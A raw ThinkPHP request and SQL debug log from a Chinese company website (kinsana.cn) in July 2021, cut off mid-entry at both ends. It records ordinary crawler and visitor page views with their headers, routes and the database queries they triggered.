'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:59:40+08:00 ] 106.11.156.85 GET /index/product/zycp.html [ info ] www.kinsana.cn/index/product/zycp.html [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,106.08kb] [文件加载:56] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'product', 2 => 'zycp', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-language' => 'zh-CN,zh;q=0.9', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36', 'upgrade-insecure-requests' => '1', 'host' => 'www.kinsana.cn', 'accept-encoding' => 'gzip, deflate', ) [ info ] [ PARAM ] array ( '/index/product/zycp_html' => '', ) [ info ] [ RUN ] app\index\controller\Product->zycp[ D:\WWW\kinsasa\application\index\controller\Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\product\zycp.htm [ array ( 0 => 'res', 1 => 'page', 2 => 'types', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `product` WHERE `cate_id` = 2 AND `state` = 1 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`cate_id`,`type_id`,`name`,`pro_name`,`sp`,`sm_img` FROM `product` WHERE `cate_id` = 2 AND `state` = 1 ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 0,9 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `type_id` FROM `product` WHERE `cate_id` = 2 AND `state` = 1 GROUP BY `type_id` [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `type` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `type` WHERE `id` IN (1) [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T19:00:59+08:00 ] 27.115.124.69 GET / [ info ] www.kinsana.cn/ [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,017.35kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'accept-language' => 'en-US', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1', 'upgrade-insecure-requests' => '1', 'cache-control' => 'no-cache', 'pragma' => 'no-cache', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T19:19:43+08:00 ] 185.191.171.36 GET /index/news/xwxq/id/109.html [ info ] xn--vhqsn14am88k.com/index/news/xwxq/id/109.html [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,192.16kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)', 'connection' => 'close', 'accept-encoding' => 'gzip,deflate', 'accept' => 'text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml, application/xhtml+xml', 'host' => 'xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/109_html' => '', 'id' => '109', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 109 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 109 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T19:44:26+08:00 ] 118.184.177.14 GET /index/news/xwxq/id/31.html [ info ] www.kinsana.cn/index/news/xwxq/id/31.html [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,200.33kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/31_html' => '', 'id' => '31', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 31 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 31 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T19:52:04+08:00 ] 207.46.13.117 GET / [ info ] www.kinsana.cn/ [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,016.36kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'host' => 'www.kinsana.cn', 'from' => 'bingbot(at)microsoft.com', 'accept-encoding' => 'gzip, deflate', 'accept' => '*/*', 'pragma' => 'no-cache', 'connection' => 'close', 'cache-control' => 'no-cache', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T19:58:53+08:00 ] 223.111.134.136 GET / [ info ] www.kinsana.cn/ [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,016.00kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept' => '*/*', 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T19:59:38+08:00 ] 223.111.134.140 GET / [ info ] www.kinsana.cn/ [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,016.00kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept' => '*/*', 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T20:09:52+08:00 ] 49.7.21.76 GET /index/news/xwxq/id/83.html [ info ] www.kinsana.cn/index/news/xwxq/id/83.html [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,173.31kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/83_html' => '', 'id' => '83', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 83 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 83 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T20:10:02+08:00 ] 54.36.149.97 GET /index/news/xwxq/id/237.html [ info ] www.kinsana.cn/index/news/xwxq/id/237.html [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,191.92kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'deflate, gzip, br', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/237_html' => '', 'id' => '237', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 237 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 237 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T20:14:00+08:00 ] 112.14.68.226 GET /index/product/cpxq/id/59.html [ info ] www.kinsana.cn/index/product/cpxq/id/59.html [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,013.23kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'product', 2 => 'cpxq', ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'gzip, deflate', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'accept-language' => 'zh,zh-CN;q=0.9', 'user-agent' => 'Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.9964.1920 Mobile Safari/537.36', 'upgrade-insecure-requests' => '1', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/product/cpxq/id/59_html' => '', 'id' => '59', ) [ info ] [ RUN ] app\index\controller\Product->cpxq[ D:\WWW\kinsasa\application\index\controller\Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\product\cpxq.htm [ array ( 0 => 'res', 1 => 'photoRes', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` `p` INNER JOIN `type` `t` ON `p`.`type_id`=`t`.`id` WHERE `p`.`id` = '59' LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `goods_photo` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `goods_photo` WHERE `goods_id` = 59 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T20:34:42+08:00 ] 106.11.153.41 GET /index/product/cpxq.html?id=131 [ info ] www.kinsana.cn/index/product/cpxq.html?id=131 [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,011.06kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'product', 2 => 'cpxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-language' => 'zh-CN,zh;q=0.9', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36', 'upgrade-insecure-requests' => '1', 'host' => 'www.kinsana.cn', 'accept-encoding' => 'gzip, deflate', ) [ info ] [ PARAM ] array ( '/index/product/cpxq_html' => '', 'id' => '131', ) [ info ] [ RUN ] app\index\controller\Product->cpxq[ D:\WWW\kinsasa\application\index\controller\Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\product\cpxq.htm [ array ( 0 => 'res', 1 => 'photoRes', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` `p` INNER JOIN `type` `t` ON `p`.`type_id`=`t`.`id` WHERE `p`.`id` = '131' LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `goods_photo` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `goods_photo` WHERE `goods_id` = 131 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T20:45:16+08:00 ] 123.183.224.168 GET /index/news/xwxq/id/89.html [ info ] www.kinsana.cn/index/news/xwxq/id/89.html [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:2,200.88kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/89_html' => '', 'id' => '89', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 89 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 89 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T20:53:14+08:00 ] 185.191.171.18 GET /index/news/xwxq/id/223.html [ info ] xn--vhqsn14am88k.com/index/news/xwxq/id/223.html [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,201.42kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)', 'connection' => 'close', 'accept-encoding' => 'gzip,deflate', 'accept' => 'text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml, application/xhtml+xml', 'host' => 'xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/223_html' => '', 'id' => '223', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 223 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 223 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T21:09:53+08:00 ] 203.208.60.3 GET /index/product/zycp.html [ info ] www.kinsana.cn/index/product/zycp.html [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,106.89kb] [文件加载:56] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'product', 2 => 'zycp', ), ) [ info ] [ HEADER ] array ( 'if-modified-since' => 'Fri, 16 Jul 2021 04:07:45 GMT', 'accept-encoding' => 'gzip, deflate, br', 'user-agent' => 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'from' => 'googlebot(at)googlebot.com', 'accept' => 'text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8', 'connection' => 'close', 'amp-cache-transform' => 'google;v="1..7"', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/product/zycp_html' => '', ) [ info ] [ RUN ] app\index\controller\Product->zycp[ D:\WWW\kinsasa\application\index\controller\Product.php ] [ 